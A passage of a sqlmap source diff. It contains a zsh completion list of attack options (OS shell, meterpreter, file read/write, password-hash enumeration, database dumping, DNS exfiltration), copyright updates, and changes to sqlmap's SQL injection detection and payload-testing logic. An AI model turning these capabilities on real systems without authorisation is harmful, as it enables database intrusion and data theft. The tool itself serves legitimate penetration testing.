'(--regexp)'--regexp=-'[Regexp to match when query is evaluated to True]:REGEXP' \
'(--code)'--code=-'[HTTP code to match when query is evaluated to True]' \
'(--text-only)'--text-only'[Compare pages based only on the textual content]' \
'(--titles)'--titles'[Compare pages based only on their titles]' \
'(--technique)'--technique=-'[SQL injection techniques to test for (default "BEUSTQ")]:TECH:->list-techniques' \
'(--time-sec)'--time-sec=-'[Seconds to delay the DBMS response (default 5)]:TIMESEC' \
'(--union-cols)'--union-cols=-'[Range of columns to test for UNION query SQL injection]:UCOLS' \
'(--union-char)'--union-char=-'[Character to use for bruteforcing number of columns]:UCHAR' \
'(--dns-domain)'--dns-domain=-'[Domain name used for DNS exfiltration attack]:DNSDOMAIN' \
'(--second-order)'--second-order=-'[Resulting page url searched for second-order response]:SECONDORDER' \
'(-f,--fingerprint)'{-f,--fingerprint}'[Perform an extensive DBMS version fingerprint]' \
'(-a,--all)'{-a,--all}'[Retrieve everything]' \
'(-b,--banner)'{-b,--banner}'[Retrieve DBMS banner]' \
'(--current-user)'--current-user'[Retrieve DBMS current user]' \
'(--current-db)'--current-db'[Retrieve DBMS current database]' \
'(--hostname)'--hostname'[Retrieve DBMS server hostname]' \
'(--is-dba)'--is-dba'[Detect if the DBMS current user is DBA]' \
'(--users)'--users'[Enumerate DBMS users]' \
'(--passwords)'--passwords'[Enumerate DBMS users password hashes]' \
'(--privileges)'--privileges'[Enumerate DBMS users privileges]' \
'(--roles)'--roles'[Enumerate DBMS users roles]' \
'(--dbs)'--dbs'[Enumerate DBMS databases]' \
'(--tables)'--tables'[Enumerate DBMS database tables]' \
'(--columns)'--columns'[Enumerate DBMS database table columns]' \
'(--schema)'--schema'[Enumerate DBMS schema]' \
'(--count)'--count'[Retrieve number of entries for table(s)]' \
'(--dump)'--dump'[Dump DBMS database table entries]' \
'(--dump-all)'--dump-all'[Dump all DBMS databases tables entries]' \
'(--search)'--search'[Search column(s), table(s) and/or database name(s)]' \
'(-D)'-D+'[DBMS database to enumerate]:DB' \
'(-T)'-T+'[DBMS database table to enumerate]:TBL' \
'(-C)'-C+'[DBMS database table column to enumerate]:COL' \
'(-U)'-U+'[DBMS user to enumerate]:USER' \
'(--exclude-sysdbs)'--exclude-sysdbs'[Exclude DBMS system databases when enumerating tables]' \
'(--start)'--start=-'[First query output entry to retrieve]:LIMITSTART' \
'(--stop)'--stop=-'[Last query output entry to retrieve]:LIMITSTOP' \
'(--first)'--first=-'[First query output word character to retrieve]:FIRSTCHAR' \
'(--last)'--last=-'[Last query output word character to retrieve]:LASTCHAR' \
'(--sql-query)'--sql-query=-'[SQL statement to be executed]:QUERY' \
'(--sql-shell)'--sql-shell'[Prompt for an interactive SQL shell]' \
'(--sql-file)'--sql-file=-'[Execute SQL statements from given file(s)]:SQLFILE:_files' \
'(--common-tables)'--common-tables'[Check existence of common tables]' \
'(--common-columns)'--common-columns'[Check existence of common columns]' \
'(--udf-inject)'--udf-inject'[Inject custom user-defined functions]' \
'(--shared-lib)'--shared-lib=-'[Local path of the shared library]:SHLIB' \
'(--file-read)'--file-read=-'[Read a file from the back-end DBMS file system]:RFILE' \
'(--file-write)'--file-write=-'[Write a local file on the back-end DBMS file system]:WFILE' \
'(--file-dest)'--file-dest=-'[Back-end DBMS absolute filepath to write to]:DFILE' \
'(--os-cmd)'--os-cmd=-'[Execute an operating system command]:OSCMD' \
'(--os-shell)'--os-shell'[Prompt for an interactive operating system shell]' \
'(--os-pwn)'--os-pwn'[Prompt for an out-of-band shell, meterpreter or VNC]' \
'(--os-smbrelay)'--os-smbrelay'[One click prompt for an OOB shell, meterpreter or VNC]' \
'(--os-bof)'--os-bof'[Stored procedure buffer overflow exploitation]' \
'(--priv-esc)'--priv-esc'[Database process user privilege escalation]' \
'(--msf-path)'--msf-path=-'[Local path where Metasploit Framework is installed]:MSFPATH' \
'(--tmp-path)'--tmp-path=-'[Remote absolute path of temporary files directory]:TMPPATH' \
'(--reg-read)'--reg-read'[Read a Windows registry key value]' \
'(--reg-add)'--reg-add'[Write a Windows registry key value data]' \
'(--reg-del)'--reg-del'[Delete a Windows registry key value]' \
'(--reg-key)'--reg-key=-'[Windows registry key]:REGKEY' \
'(--reg-value)'--reg-value=-'[Windows registry key value]:REGVAL' \
'(--reg-data)'--reg-data=-'[Windows registry key value data]:REGDATA' \
'(--reg-type)'--reg-type=-'[Windows registry key value type]:REGTYPE' \
'(-t)'-t+'[Log all HTTP traffic into a textual file]:TRAFFICFILE' \
'(--batch)'--batch'[Never ask for user input, use the default behaviour]' \
'(--charset)'--charset=-'[Force character encoding used for data retrieval]:CHARSET' \
'(--check-tor)'--check-tor'[Check to see if Tor is used properly]' \
'(--crawl)'--crawl=-'[Crawl the website starting from the target url]:CRAWLDEPTH' \
'(--csv-del)'--csv-del=-'[Delimiting character used in CSV output (default is ,)]:CSVDEL' \
'(--dbms-cred)'--dbms-cred=-'[DBMS authentication credentials (user:password)]:DBMS authentication credentials' \
'(--eta)'--eta'[Display for each output the estimated time of arrival]' \
'(--flush-session)'--flush-session'[Flush session files for current target]' \
'(--forms)'--forms'[Parse and test forms on target url]' \
'(--fresh-queries)'--fresh-queries'[Ignores query results stored in session file]' \
'(--hex)'--hex'[Uses DBMS hex function(s) for data retrieval]' \
'(--output-dir)'--output-dir=-'[Custom output directory path]:ODIR' \
'(--parse-errors)'--parse-errors'[Parse and display DBMS error messages from responses]' \
'(--save)'--save'[Save options to a configuration INI file]' \
'(--tor)'--tor'[Use Tor anonymity network]' \
'(--tor-port)'--tor-port=-'[Set Tor proxy port other than default]:TORPORT' \
'(--tor-type)'--tor-type=-'[Set Tor proxy type (HTTP - default, SOCKS4 or SOCKS5)]:TORTYPE' \
'(--update)'--update'[Update sqlmap]' \
'(-z)'-z+'[Use short mnemonics (e.g. flu,bat,ban,tec=EU)]:MNEMONICS' \
'(--check-payload)'--check-payload'[Offline WAF/IPS/IDS payload detection testing]' \
'(--check-waf)'--check-waf'[Check for existence of WAF/IPS/IDS protection]' \
'(--cleanup)'--cleanup'[Clean up the DBMS by sqlmap specific UDF and tables]' \
'(--dependencies)'--dependencies'[Check for missing (non-core) sqlmap dependencies]' \
'(--disable-coloring)'--disable-coloring'[Disable console output coloring]' \
'(--gpage)'--gpage=-'[Use Google dork results from specified page number]:GOOGLEPAGE' \
'(--mobile)'--mobile'[Imitate smartphone through HTTP User-Agent header]' \
'(--page-rank)'--page-rank'[Display page rank (PR) for Google dork results]' \
'(--purge-output)'--purge-output'[Safely remove all content from output directory]' \
'(--smart)'--smart'[Conduct through tests only if positive heuristic(s)]' \
'(--test-filter)'--test-filter=-'[Select tests by payloads and/or titles (e.g. ROW)]:test-filter' \
'(--wizard)'--wizard'[Simple wizard interface for beginner users]' && return 0

case "$state" in
list-dbms)
_values -S : 'DBMS' 'access' 'db2' 'firebird' 'maxdb' 'mssqlserver' 'mysql' 'oracle' 'postgresql' \
'sqlite' 'sybase'
;;
list-os)
_values -S : 'os' 'Linux' 'Windows'
;;
list-techniques)
_values -S : 'technique' \
'B[Boolean]' 'E[Error]' 'U[Union]' 'S[Stacked]' 'T[Time]'
;;
esac

return 0
@@ -1,6 +1,6 @@
 #!/usr/bin/env python
 
-# Copyright (c) 2006-2013 sqlmap developers (http://sqlmap.org/)
+# Copyright (c) 2006-2015 sqlmap developers (http://sqlmap.org/)
 # See the file 'doc/COPYING' for copying permission
 
 # Removes duplicate entries in wordlist like files
 
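The script touched above identifies itself as a remover of duplicate entries in wordlist-like files; a minimal sketch of that idea (not the actual extra/shutils script):

    def dedupe_wordlist(lines):
        # Drop repeated entries while preserving the original order
        seen = set()
        return [line for line in lines if not (line in seen or seen.add(line))]

    print(dedupe_wordlist(["admin", "root", "admin"]))  # ['admin', 'root']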
extra/shutils/regressiontest.py (7 lines changed; mode changed from normal file to executable file)

@@ -1,6 +1,6 @@
 #!/usr/bin/env python
 
-# Copyright (c) 2006-2013 sqlmap developers (http://sqlmap.org/)
+# Copyright (c) 2006-2015 sqlmap developers (http://sqlmap.org/)
 # See the file 'doc/COPYING' for copying permission
 
 import codecs

@@ -31,6 +31,7 @@ FROM = "regressiontest@sqlmap.org"
 #TO = "dev@sqlmap.org"
 TO = ["bernardo.damele@gmail.com", "miroslav.stampar@gmail.com"]
 SUBJECT = "regression test started on %s using revision %s" % (START_TIME, REVISION)
+TARGET = "debian"
 
 def prepare_email(content):
     global FROM

@@ -83,7 +84,7 @@ def main():
     if stderr:
         failure_email("Execution of regression test failed with error:\n\n%s" % stderr)
 
-    failed_tests = re.findall("running live test case: (.+?) \((\d+)\/\d+\)[\r]*\n.+test failed (at parsing item \"(.+)\" )?\- scan folder: (\/.+) \- traceback: (.*?)( - SQL injection not detected)?[\r]*\n", stdout, re.M)
+    failed_tests = re.findall("running live test case: (.+?) \((\d+)\/\d+\)[\r]*\n.+test failed (at parsing items: (.+))?\s*\- scan folder: (\/.+) \- traceback: (.*?)( - SQL injection not detected)?[\r]*\n", stdout, re.M)
 
     for failed_test in failed_tests:
         title = failed_test[0]

@@ -96,7 +97,7 @@ def main():
         test_counts.append(test_count)
 
         console_output_file = os.path.join(output_folder, "console_output")
-        log_file = os.path.join(output_folder, "debiandev", "log")
+        log_file = os.path.join(output_folder, TARGET, "log")
         traceback_file = os.path.join(output_folder, "traceback")
 
         if os.path.exists(console_output_file):
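The last two hunks replace the hard-coded "debiandev" path component with the new TARGET constant. A standalone sketch of the resulting path construction (illustrative only, not the full script):

    import os

    TARGET = "debian"  # target name that used to be hard-coded as "debiandev"

    def log_path(output_folder):
        # Per-target log location, as composed in regressiontest.py's main()
        return os.path.join(output_folder, TARGET, "log")

    print(log_path("/tmp/regression-output"))  # /tmp/regression-output/debian/log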
@@ -1,7 +1,7 @@
 #!/usr/bin/env python
 
 """
-Copyright (c) 2006-2013 sqlmap developers (http://sqlmap.org/)
+Copyright (c) 2006-2015 sqlmap developers (http://sqlmap.org/)
 See the file 'doc/COPYING' for copying permission
 """
 

@@ -1,7 +1,7 @@
 #!/usr/bin/env python
 
 """
-Copyright (c) 2006-2013 sqlmap developers (http://sqlmap.org/)
+Copyright (c) 2006-2015 sqlmap developers (http://sqlmap.org/)
 See the file 'doc/COPYING' for copying permission
 """
 

@@ -1,7 +1,7 @@
 #!/usr/bin/env python
 
 """
-Copyright (c) 2006-2013 sqlmap developers (http://sqlmap.org/)
+Copyright (c) 2006-2015 sqlmap developers (http://sqlmap.org/)
 See the file 'doc/COPYING' for copying permission
 """
 

@@ -1,7 +1,7 @@
 #!/usr/bin/env python
 
 """
-Copyright (c) 2006-2013 sqlmap developers (http://sqlmap.org/)
+Copyright (c) 2006-2015 sqlmap developers (http://sqlmap.org/)
 See the file 'doc/COPYING' for copying permission
 """
 

@@ -1,7 +1,7 @@
 #!/usr/bin/env python
 
 """
-Copyright (c) 2006-2013 sqlmap developers (http://sqlmap.org/)
+Copyright (c) 2006-2015 sqlmap developers (http://sqlmap.org/)
 See the file 'doc/COPYING' for copying permission
 """
 

@@ -1,7 +1,7 @@
 #!/usr/bin/env python
 
 """
-Copyright (c) 2006-2013 sqlmap developers (http://sqlmap.org/)
+Copyright (c) 2006-2015 sqlmap developers (http://sqlmap.org/)
 See the file 'doc/COPYING' for copying permission
 """
 
|
@@ -46,6 +46,7 @@ from lib.core.datatype import AttribDict
from lib.core.datatype import InjectionDict
from lib.core.decorators import cachedmethod
from lib.core.dicts import FROM_DUMMY_TABLE
+from lib.core.enums import CUSTOM_LOGGING
from lib.core.enums import DBMS
from lib.core.enums import HEURISTIC_TEST
from lib.core.enums import HTTP_HEADER
@@ -53,17 +54,22 @@ from lib.core.enums import HTTPMETHOD
from lib.core.enums import NULLCONNECTION
from lib.core.enums import PAYLOAD
from lib.core.enums import PLACE
+from lib.core.enums import REDIRECTION
from lib.core.exception import SqlmapConnectionException
from lib.core.exception import SqlmapNoneDataException
from lib.core.exception import SqlmapSilentQuitException
from lib.core.exception import SqlmapUserQuitException
+from lib.core.settings import DEFAULT_GET_POST_DELIMITER
+from lib.core.settings import DUMMY_XSS_CHECK_APPENDIX
from lib.core.settings import FORMAT_EXCEPTION_STRINGS
from lib.core.settings import HEURISTIC_CHECK_ALPHABET
from lib.core.settings import SUHOSIN_MAX_VALUE_LENGTH
-from lib.core.settings import UNKNOWN_DBMS
+from lib.core.settings import SUPPORTED_DBMS
+from lib.core.settings import URI_HTTP_HEADER
from lib.core.settings import LOWER_RATIO_BOUND
from lib.core.settings import UPPER_RATIO_BOUND
from lib.core.settings import IDS_WAF_CHECK_PAYLOAD
+from lib.core.settings import IDS_WAF_CHECK_RATIO
from lib.core.threads import getCurrentThreadData
from lib.request.connect import Connect as Request
from lib.request.inject import checkBooleanExpression
@@ -82,31 +88,52 @@ def checkSqlInjection(place, parameter, value):
# Set the flag for SQL injection test mode
kb.testMode = True

-for test in getSortedInjectionTests():
+paramType = conf.method if conf.method not in (None, HTTPMETHOD.GET, HTTPMETHOD.POST) else place
+tests = getSortedInjectionTests()

+while tests:
+test = tests.pop(0)

try:
if kb.endDetection:
break

if conf.dbms is None:
+# If the DBMS has not yet been fingerprinted (via simple heuristic check
+# or via DBMS-specific payload) and boolean-based blind has been identified
+# then attempt to identify with a simple DBMS specific boolean-based
+# test what the DBMS may be
if not injection.dbms and PAYLOAD.TECHNIQUE.BOOLEAN in injection.data:
-if not Backend.getIdentifiedDbms() and not kb.heuristicDbms:
-kb.heuristicDbms = heuristicCheckDbms(injection) or UNKNOWN_DBMS
+if not Backend.getIdentifiedDbms() and kb.heuristicDbms is False:
+kb.heuristicDbms = heuristicCheckDbms(injection)

-if not conf.testFilter and (Backend.getErrorParsedDBMSes() or kb.heuristicDbms) not in ([], None, UNKNOWN_DBMS):
-if kb.reduceTests is None and Backend.getErrorParsedDBMSes():
-msg = "heuristic (parsing) test showed that the "
-msg += "back-end DBMS could be '%s'. " % (Format.getErrorParsedDBMSes() if Backend.getErrorParsedDBMSes() else kb.heuristicDbms)
-msg += "Do you want to skip test payloads specific for other DBMSes? [Y/n]"
-kb.reduceTests = [] if readInput(msg, default='Y').upper() != 'Y' else (Backend.getErrorParsedDBMSes() or [kb.heuristicDbms])
+# If the DBMS has already been fingerprinted (via DBMS-specific
+# error message, simple heuristic check or via DBMS-specific
+# payload), ask the user to limit the tests to the fingerprinted
+# DBMS
+if kb.reduceTests is None and not conf.testFilter and (intersect(Backend.getErrorParsedDBMSes(), \
+SUPPORTED_DBMS, True) or kb.heuristicDbms or injection.dbms):
+msg = "it looks like the back-end DBMS is '%s'. " % (Format.getErrorParsedDBMSes() or kb.heuristicDbms or injection.dbms)
+msg += "Do you want to skip test payloads specific for other DBMSes? [Y/n]"
+kb.reduceTests = (Backend.getErrorParsedDBMSes() or [kb.heuristicDbms]) if readInput(msg, default='Y').upper() == 'Y' else []

-if kb.extendTests is None:
-_ = (Format.getErrorParsedDBMSes() if Backend.getErrorParsedDBMSes() else kb.heuristicDbms)
-msg = "do you want to include all tests for '%s' " % _
-msg += "extending provided level (%d) and risk (%s)? [Y/n]" % (conf.level, conf.risk)
-kb.extendTests = [] if readInput(msg, default='Y').upper() != 'Y' else (Backend.getErrorParsedDBMSes() or [kb.heuristicDbms])
+# If the DBMS has been fingerprinted (via DBMS-specific error
+# message, via simple heuristic check or via DBMS-specific
+# payload), ask the user to extend the tests to all DBMS-specific,
+# regardless of --level and --risk values provided
+if kb.extendTests is None and not conf.testFilter and (conf.level < 5 or conf.risk < 3) \
+and (intersect(Backend.getErrorParsedDBMSes(), SUPPORTED_DBMS, True) or \
+kb.heuristicDbms or injection.dbms):
+msg = "for the remaining tests, do you want to include all tests "
+msg += "for '%s' extending provided " % (Format.getErrorParsedDBMSes() or kb.heuristicDbms or injection.dbms)
+msg += "level (%d)" % conf.level if conf.level < 5 else ""
+msg += " and " if conf.level < 5 and conf.risk < 3 else ""
+msg += "risk (%d)" % conf.risk if conf.risk < 3 else ""
+msg += " values? [Y/n]" if conf.level < 5 and conf.risk < 3 else " value? [Y/n]"
+kb.extendTests = (Backend.getErrorParsedDBMSes() or [kb.heuristicDbms]) if readInput(msg, default='Y').upper() == 'Y' else []

title = test.title
-stype = test.stype
+kb.testType = stype = test.stype
clause = test.clause
unionExtended = False

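Note on the hunk above: replacing the plain for-loop with an explicit test queue is what later allows an interrupted test to be pushed back to the front and retried (see the verbosity-change handler further down, which calls tests.insert(0, test)). A minimal, self-contained sketch of that scheduling idea, with made-up test names and a stand-in runner:

    def run_tests(tests, run_one):
        # list used as a FIFO queue so a handler can put the current test back
        tests = list(tests)
        while tests:
            test = tests.pop(0)
            if run_one(test) == "retry":
                tests.insert(0, test)  # the same test is picked up again next turn

    calls = []
    run_tests(["boolean", "error", "union"],
              lambda t: calls.append(t) or ("retry" if calls.count("error") == 1 else "done"))
    print(calls)  # ['boolean', 'error', 'error', 'union']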
@@ -163,27 +190,56 @@ def checkSqlInjection(place, parameter, value):
logger.debug(debugMsg)
continue

+# Parse DBMS-specific payloads' details
-# Skip DBMS-specific test if it does not match either the
-# previously identified or the user's provided DBMS (either
-# from program switch or from parsed error message(s))
if "details" in test and "dbms" in test.details:
-dbms = test.details.dbms
+payloadDbms = test.details.dbms
else:
-dbms = None
+payloadDbms = None

-# Skip tests if title is not included by the given filter
-if conf.testFilter:
-if not any(re.search(conf.testFilter, str(item), re.I) for item in (test.title, test.vector, dbms)):
-debugMsg = "skipping test '%s' because " % title
-debugMsg += "its name/vector/dbms is not included by the given filter"
+# Skip tests if title, vector or DBMS is not included by the
+# given test filter
+if conf.testFilter and not any(conf.testFilter in str(item) or \
+re.search(conf.testFilter, str(item), re.I) for item in \
+(test.title, test.vector, payloadDbms)):
+debugMsg = "skipping test '%s' because its " % title
+debugMsg += "name/vector/DBMS is not included by the given filter"
logger.debug(debugMsg)
continue

-elif not (kb.extendTests and intersect(dbms, kb.extendTests)):
+if payloadDbms is not None:
+# Skip DBMS-specific test if it does not match the user's
+# provided DBMS
+if conf.dbms is not None and not intersect(payloadDbms, conf.dbms, True):
+debugMsg = "skipping test '%s' because " % title
+debugMsg += "the provided DBMS is %s" % conf.dbms
+logger.debug(debugMsg)
+continue

+# Skip DBMS-specific test if it does not match the
+# previously identified DBMS (via DBMS-specific payload)
+if injection.dbms is not None and not intersect(payloadDbms, injection.dbms, True):
+debugMsg = "skipping test '%s' because the identified " % title
+debugMsg += "back-end DBMS is %s" % injection.dbms
+logger.debug(debugMsg)
+continue

+# Skip DBMS-specific test if it does not match the
+# previously identified DBMS (via DBMS-specific error message)
+if kb.reduceTests and not intersect(payloadDbms, kb.reduceTests, True):
+debugMsg = "skipping test '%s' because the parsed " % title
+debugMsg += "error message(s) showed that the back-end DBMS "
+debugMsg += "could be %s" % Format.getErrorParsedDBMSes()
+logger.debug(debugMsg)
+continue

+# If the user did not decide to extend the tests to all
+# DBMS-specific or the test payloads is not specific to the
+# identified DBMS, then only test for it if both level and risk
+# are below the corrisponding configuration's level and risk
+# values
+if not conf.testFilter and not (kb.extendTests and intersect(payloadDbms, kb.extendTests, True)):
# Skip test if the risk is higher than the provided (or default)
# value
-# Parse test's <risk>
if test.risk > conf.risk:
debugMsg = "skipping test '%s' because the risk (%d) " % (title, test.risk)
debugMsg += "is higher than the provided (%d)" % conf.risk
@@ -192,35 +248,12 @@ def checkSqlInjection(place, parameter, value):

# Skip test if the level is higher than the provided (or default)
# value
-# Parse test's <level>
if test.level > conf.level:
debugMsg = "skipping test '%s' because the level (%d) " % (title, test.level)
debugMsg += "is higher than the provided (%d)" % conf.level
logger.debug(debugMsg)
continue

-if dbms is not None:
-if injection.dbms is not None and not intersect(injection.dbms, dbms):
-debugMsg = "skipping test '%s' because " % title
-debugMsg += "the back-end DBMS identified is "
-debugMsg += "%s" % injection.dbms
-logger.debug(debugMsg)
-continue

-if conf.dbms is not None and not intersect(conf.dbms.lower(), [value.lower() for value in arrayizeValue(dbms)]):
-debugMsg = "skipping test '%s' because " % title
-debugMsg += "the provided DBMS is %s" % conf.dbms
-logger.debug(debugMsg)
-continue

-if kb.reduceTests and not intersect(dbms, kb.reduceTests):
-debugMsg = "skipping test '%s' because " % title
-debugMsg += "the parsed error message(s) showed "
-debugMsg += "that the back-end DBMS could be "
-debugMsg += "%s" % Format.getErrorParsedDBMSes()
-logger.debug(debugMsg)
-continue

# Skip test if it does not match the same SQL injection clause
# already identified by another test
clauseMatch = False
@@ -232,11 +265,11 @@ def checkSqlInjection(place, parameter, value):

if clause != [0] and injection.clause and injection.clause != [0] and not clauseMatch:
debugMsg = "skipping test '%s' because the clauses " % title
-debugMsg += "differs from the clause already identified"
+debugMsg += "differ from the clause already identified"
logger.debug(debugMsg)
continue

-# Skip test if the user provided custom character
+# Skip test if the user provided custom character (for UNION-based payloads)
if conf.uChar is not None and ("random number" in title or "(NULL)" in title):
debugMsg = "skipping test '%s' because the user " % title
debugMsg += "provided a specific character, %s" % conf.uChar
@@ -246,13 +279,13 @@ def checkSqlInjection(place, parameter, value):
infoMsg = "testing '%s'" % title
logger.info(infoMsg)

-# Force back-end DBMS according to the current
-# test value for proper payload unescaping
-Backend.forceDbms(dbms[0] if isinstance(dbms, list) else dbms)
+# Force back-end DBMS according to the current test DBMS value
+# for proper payload unescaping
+Backend.forceDbms(payloadDbms[0] if isinstance(payloadDbms, list) else payloadDbms)

# Parse test's <request>
comment = agent.getComment(test.request) if len(conf.boundaries) > 1 else None
-fstPayload = agent.cleanupPayload(test.request.payload, origValue=value)
+fstPayload = agent.cleanupPayload(test.request.payload, origValue=value if place not in (PLACE.URI, PLACE.CUSTOM_POST, PLACE.CUSTOM_HEADER) else None)

# Favoring non-string specific boundaries in case of digit-like parameter values
if value.isdigit():
@@ -266,7 +299,7 @@ def checkSqlInjection(place, parameter, value):
# Skip boundary if the level is higher than the provided (or
# default) value
# Parse boundary's <level>
-if boundary.level > conf.level:
+if boundary.level > conf.level and not (kb.extendTests and intersect(payloadDbms, kb.extendTests, True)):
continue

# Skip boundary if it does not match against test's <clause>
@@ -296,14 +329,13 @@ def checkSqlInjection(place, parameter, value):
# Parse boundary's <prefix>, <suffix> and <ptype>
prefix = boundary.prefix if boundary.prefix else ""
suffix = boundary.suffix if boundary.suffix else ""
+ptype = boundary.ptype

# Options --prefix/--suffix have a higher priority (if set by user)
prefix = conf.prefix if conf.prefix is not None else prefix
suffix = conf.suffix if conf.suffix is not None else suffix
comment = None if conf.suffix is not None else comment

-ptype = boundary.ptype

# If the previous injections succeeded, we know which prefix,
# suffix and parameter type to use for further tests, no
# need to cycle through the boundaries for the following tests
@@ -311,7 +343,9 @@ def checkSqlInjection(place, parameter, value):
condBound &= (injection.prefix != prefix or injection.suffix != suffix)
condType = injection.ptype is not None and injection.ptype != ptype

-if condBound or condType:
+# If the payload is an inline query test for it regardless
+# of previously identified injection types
+if stype != PAYLOAD.TECHNIQUE.QUERY and (condBound or condType):
continue

# For each test's <where>
@@ -321,20 +355,29 @@ def checkSqlInjection(place, parameter, value):

# Threat the parameter original value according to the
# test's <where> tag
-if where == PAYLOAD.WHERE.ORIGINAL:
+if where == PAYLOAD.WHERE.ORIGINAL or conf.prefix:
origValue = value

+if kb.tamperFunctions:
+templatePayload = agent.payload(place, parameter, value="", newValue=origValue, where=where)
elif where == PAYLOAD.WHERE.NEGATIVE:
# Use different page template than the original
# one as we are changing parameters value, which
# will likely result in a different content
+kb.data.setdefault("randomInt", str(randomInt(10)))
+kb.data.setdefault("randomStr", str(randomStr(10)))

if conf.invalidLogical:
-_ = randomInt(2)
+_ = int(kb.data.randomInt[:2])
origValue = "%s AND %s=%s" % (value, _, _ + 1)
elif conf.invalidBignum:
-origValue = "%d.%d" % (randomInt(6), randomInt(1))
+origValue = kb.data.randomInt[:6]
+elif conf.invalidString:
+origValue = kb.data.randomStr[:6]
else:
-origValue = "-%s" % randomInt()
-templatePayload = agent.payload(place, parameter, newValue=origValue, where=where)
+origValue = "-%s" % kb.data.randomInt[:4]

+templatePayload = agent.payload(place, parameter, value="", newValue=origValue, where=where)
elif where == PAYLOAD.WHERE.REPLACE:
origValue = ""

@@ -351,13 +394,13 @@ def checkSqlInjection(place, parameter, value):
# payload was successful
# Parse test's <response>
for method, check in test.response.items():
-check = agent.cleanupPayload(check, origValue=value)
+check = agent.cleanupPayload(check, origValue=value if place not in (PLACE.URI, PLACE.CUSTOM_POST, PLACE.CUSTOM_HEADER) else None)

# In case of boolean-based blind SQL injection
if method == PAYLOAD.METHOD.COMPARISON:
# Generate payload used for comparison
def genCmpPayload():
-sndPayload = agent.cleanupPayload(test.response.comparison, origValue=value)
+sndPayload = agent.cleanupPayload(test.response.comparison, origValue=value if place not in (PLACE.URI, PLACE.CUSTOM_POST, PLACE.CUSTOM_HEADER) else None)

# Forge response payload by prepending with
# boundary's prefix and appending the boundary's
@@ -385,7 +428,7 @@ def checkSqlInjection(place, parameter, value):

# Perform the test's False request
if not falseResult:
-infoMsg = "%s parameter '%s' is '%s' injectable " % (place, parameter, title)
+infoMsg = "%s parameter '%s' seems to be '%s' injectable " % (paramType, parameter, title)
logger.info(infoMsg)

injectable = True
@@ -394,9 +437,10 @@ def checkSqlInjection(place, parameter, value):
trueSet = set(extractTextTagContent(truePage))
falseSet = set(extractTextTagContent(falsePage))
candidates = filter(None, (_.strip() if _.strip() in (kb.pageTemplate or "") and _.strip() not in falsePage and _.strip() not in threadData.lastComparisonHeaders else None for _ in (trueSet - falseSet)))

if candidates:
conf.string = candidates[0]
-infoMsg = "%s parameter '%s' seems to be '%s' injectable (with --string=\"%s\")" % (place, parameter, title, repr(conf.string).lstrip('u').strip("'"))
+infoMsg = "%s parameter '%s' seems to be '%s' injectable (with --string=\"%s\")" % (paramType, parameter, title, repr(conf.string).lstrip('u').strip("'"))
logger.info(infoMsg)

injectable = True
@@ -408,7 +452,8 @@ def checkSqlInjection(place, parameter, value):
try:
page, headers = Request.queryPage(reqPayload, place, content=True, raise404=False)
output = extractRegexResult(check, page, re.DOTALL | re.IGNORECASE) \
-or extractRegexResult(check, listToStrValue(headers.headers \
+or extractRegexResult(check, listToStrValue( \
+[headers[key] for key in headers.keys() if key.lower() != URI_HTTP_HEADER.lower()] \
if headers else None), re.DOTALL | re.IGNORECASE) \
or extractRegexResult(check, threadData.lastRedirectMsg[1] \
if threadData.lastRedirectMsg and threadData.lastRedirectMsg[0] == \
@@ -418,13 +463,13 @@ def checkSqlInjection(place, parameter, value):
result = output == "1"

if result:
-infoMsg = "%s parameter '%s' is '%s' injectable " % (place, parameter, title)
+infoMsg = "%s parameter '%s' is '%s' injectable " % (paramType, parameter, title)
logger.info(infoMsg)

injectable = True

except SqlmapConnectionException, msg:
-debugMsg = "problem occured most likely because the "
+debugMsg = "problem occurred most likely because the "
debugMsg += "server hasn't recovered as expected from the "
debugMsg += "error-based payload used ('%s')" % msg
logger.debug(debugMsg)
@@ -440,7 +485,7 @@ def checkSqlInjection(place, parameter, value):
trueResult = Request.queryPage(reqPayload, place, timeBasedCompare=True, raise404=False)

if trueResult:
-infoMsg = "%s parameter '%s' is '%s' injectable " % (place, parameter, title)
+infoMsg = "%s parameter '%s' seems to be '%s' injectable " % (paramType, parameter, title)
logger.info(infoMsg)

injectable = True
@@ -456,7 +501,7 @@ def checkSqlInjection(place, parameter, value):
configUnion(test.request.char, test.request.columns)

if not Backend.getIdentifiedDbms():
-if kb.heuristicDbms in (None, UNKNOWN_DBMS):
+if kb.heuristicDbms is None:
warnMsg = "using unescaped version of the test "
warnMsg += "because of zero knowledge of the "
warnMsg += "back-end DBMS. You can try to "
@ -466,17 +511,17 @@ def checkSqlInjection(place, parameter, value):
|
||||||
Backend.forceDbms(kb.heuristicDbms)
|
Backend.forceDbms(kb.heuristicDbms)
|
||||||
|
|
||||||
if unionExtended:
|
if unionExtended:
|
||||||
infoMsg = "automatically extending ranges "
|
infoMsg = "automatically extending ranges for UNION "
|
||||||
infoMsg += "for UNION query injection technique tests as "
|
infoMsg += "query injection technique tests as "
|
||||||
infoMsg += "there is at least one other potential "
|
infoMsg += "there is at least one other (potential) "
|
||||||
infoMsg += "injection technique found"
|
infoMsg += "technique found"
|
||||||
singleTimeLogMessage(infoMsg)
|
singleTimeLogMessage(infoMsg)
|
||||||
|
|
||||||
# Test for UNION query SQL injection
|
# Test for UNION query SQL injection
|
||||||
reqPayload, vector = unionTest(comment, place, parameter, value, prefix, suffix)
|
reqPayload, vector = unionTest(comment, place, parameter, value, prefix, suffix)
|
||||||
|
|
||||||
if isinstance(reqPayload, basestring):
|
if isinstance(reqPayload, basestring):
|
||||||
infoMsg = "%s parameter '%s' is '%s' injectable" % (place, parameter, title)
|
infoMsg = "%s parameter '%s' is '%s' injectable" % (paramType, parameter, title)
|
||||||
logger.info(infoMsg)
|
logger.info(infoMsg)
|
||||||
|
|
||||||
injectable = True
|
injectable = True
|
||||||
|
@ -487,6 +532,9 @@ def checkSqlInjection(place, parameter, value):
|
||||||
|
|
||||||
kb.previousMethod = method
|
kb.previousMethod = method
|
||||||
|
|
||||||
|
if conf.dummy:
|
||||||
|
injectable = False
|
||||||
|
|
||||||
# If the injection test was successful feed the injection
|
# If the injection test was successful feed the injection
|
||||||
# object with the test's details
|
# object with the test's details
|
||||||
if injectable is True:
|
if injectable is True:
|
||||||
|
@ -509,12 +557,15 @@ def checkSqlInjection(place, parameter, value):
|
||||||
for dKey, dValue in test.details.items():
|
for dKey, dValue in test.details.items():
|
||||||
if dKey == "dbms":
|
if dKey == "dbms":
|
||||||
injection.dbms = dValue
|
injection.dbms = dValue
|
||||||
|
|
||||||
if not isinstance(dValue, list):
|
if not isinstance(dValue, list):
|
||||||
Backend.setDbms(dValue)
|
Backend.setDbms(dValue)
|
||||||
else:
|
else:
|
||||||
